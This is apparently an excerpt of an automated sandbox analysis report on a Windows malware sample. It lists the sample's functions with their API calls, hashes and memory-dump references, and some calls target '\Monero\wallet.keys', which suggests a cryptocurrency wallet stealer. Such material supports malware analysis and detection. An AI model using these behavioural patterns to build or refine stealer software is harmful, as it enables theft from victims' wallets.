                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 63b4f0838f16e9afe5089529017587582f216d28de1a8e6e4a619e17fb49d990
                          • Instruction ID: ca45c3fe0ea9eabc3ceeaaad92b1a28fe63b3528decb24f8aaaff76b66b51ecf
                          • Opcode Fuzzy Hash: 63b4f0838f16e9afe5089529017587582f216d28de1a8e6e4a619e17fb49d990
                          • Instruction Fuzzy Hash: D01151B1A44705EBD704CF94ED89FBBBBB9FB08712F104259F605A7290D77858018FA1
                          Function 00629260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(0111DF48,?,?,?,0062140C,?,0111DF48,00000000), ref: 0062926C
                          • lstrcpyn.KERNEL32(0085AB88,0111DF48,0111DF48,?,0062140C,?,0111DF48), ref: 00629290
                          • lstrlen.KERNEL32(?,?,0062140C,?,0111DF48), ref: 006292A7
                          • wsprintfA.USER32 ref: 006292C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 8b5e3bda8f250cf9306b568113c28155fb3cf6d756dc157036502434961d3efa
                          • Instruction ID: 2e52ee098eba0c63bca8ac7d452adb84ee4fe77ce6c3c30d506bc4836cc67150
                          • Opcode Fuzzy Hash: 8b5e3bda8f250cf9306b568113c28155fb3cf6d756dc157036502434961d3efa
                          • Instruction Fuzzy Hash: D301AD75900209FFCB08DFD8D994DAD7BB9FB48355F108248F90997204C6359A44DBE2
                          Function 006112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006112B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006112BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006112D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006112F5
                          • RegCloseKey.ADVAPI32(?), ref: 006112FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 9f3208642e1c652686511f0477f1520c9bb18349b29fbb77d6351d0e7d494cfc
                          • Instruction ID: 6c9526ac31729a9a9de378b8a050e671b0637dc9714c64fc4b2c83acde73f620
                          • Opcode Fuzzy Hash: 9f3208642e1c652686511f0477f1520c9bb18349b29fbb77d6351d0e7d494cfc
                          • Instruction Fuzzy Hash: 830112B5A40308BBDB04DFD0DC89FAEB7B8FB48702F008155FA0597280D6759A418B51
                          Function 00626630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00626663
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00626726
                          • ExitProcess.KERNEL32 ref: 00626755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: bc1dbc9eb4e7f40eb6524f4fa51bfd6f6727a42cccb9eda2778a1e323e6981d9
                          • Instruction ID: 2f7a79778b4ed7a8cbd9606adb348efeae16039a89e3557ccc9dc4fa0121e19a
                          • Opcode Fuzzy Hash: bc1dbc9eb4e7f40eb6524f4fa51bfd6f6727a42cccb9eda2778a1e323e6981d9
                          • Instruction Fuzzy Hash: 34312DB1C01628ABDB54EB90EC92FDD7779BF08300F404199F20566191DFB86B88CF5A
                          Function 006287C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00630E28,00000000,?), ref: 0062882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00628836
                          • wsprintfA.USER32 ref: 00628850
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 8057caba3127e02b19aabb8b5563dd6f49ed7aa0f7d46ba15d5f3529e0230147
                          • Instruction ID: bcb20b9407f35ce14c94556ea852027de05656352e3963c3f940822515158785
                          • Opcode Fuzzy Hash: 8057caba3127e02b19aabb8b5563dd6f49ed7aa0f7d46ba15d5f3529e0230147
                          • Instruction Fuzzy Hash: 332100B1A40308AFDB04DF94DD85FAEBBB9FB48712F104259F605A7280C77999018BA5
                          Function 00628D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0062951E,00000000), ref: 00628D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00628D62
                          • wsprintfW.USER32 ref: 00628D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 343a2fdc161188719ef2d2e423e07810a68fcb57ad5effdd010ed255252379c0
                          • Instruction ID: f06039924d542722ac5d9c83453159323ff6e19938fb6136b8171596ab3f1361
                          • Opcode Fuzzy Hash: 343a2fdc161188719ef2d2e423e07810a68fcb57ad5effdd010ed255252379c0
                          • Instruction Fuzzy Hash: E0E08CB0A40308BBDB04DB94DC4AE697BB8FB08703F0002A4FE0987280DA759E008B92
                          Function 0061A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0061A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0061A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0061A6BC
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0061A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: c8970640ab729dc6b84cd9db58a520af7ce6168544d9582c98dd07d56c47b8f7
                          • Instruction ID: 28070fa143977e8bfb30b9e0eff1834df67e47ca133d6356a08059a75cba4af7
                          • Opcode Fuzzy Hash: c8970640ab729dc6b84cd9db58a520af7ce6168544d9582c98dd07d56c47b8f7
                          • Instruction Fuzzy Hash: A6E1E2728105289BDB44EBE4EC92EEE733ABF18300F50815DF51676091EF746A49CF6A
                          Function 0061D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0061D481
                          • lstrlen.KERNEL32(00000000), ref: 0061D698
                          • lstrlen.KERNEL32(00000000), ref: 0061D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0061D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 34b202613f1e8a98c2020c98a8722332470c25d7f7a198e570621b64364c1362
                          • Instruction ID: 42fff773919bfbb9bff69cf5e688d3a763342388e18af086befdf23494862160
                          • Opcode Fuzzy Hash: 34b202613f1e8a98c2020c98a8722332470c25d7f7a198e570621b64364c1362
                          • Instruction Fuzzy Hash: 4C91F1728105189BDB48FBE4EC96DEE733AAF14300F50456CF50766091EF786A49CF6A
                          Function 0061D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0061D801
                          • lstrlen.KERNEL32(00000000), ref: 0061D99F
                          • lstrlen.KERNEL32(00000000), ref: 0061D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0061DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: cd02dbd27aee6d53fe368f6f665d4b9aabe8a9d6f66642eb41f39ba57c5d61a6
                          • Instruction ID: 40b5ba33c27a90d89c64c0c3b095a3c291a5a2bf8c46056a4e4f5c7cfcbc722c
                          • Opcode Fuzzy Hash: cd02dbd27aee6d53fe368f6f665d4b9aabe8a9d6f66642eb41f39ba57c5d61a6
                          • Instruction Fuzzy Hash: BC81E1719105289BDB48FBE4EC96DEE733ABF14300F50451CF506A6091EF786A49CFAA
                          Function 0061F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00631580,00630D92), ref: 0061F54C
                          • lstrlen.KERNEL32(00000000), ref: 0061F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
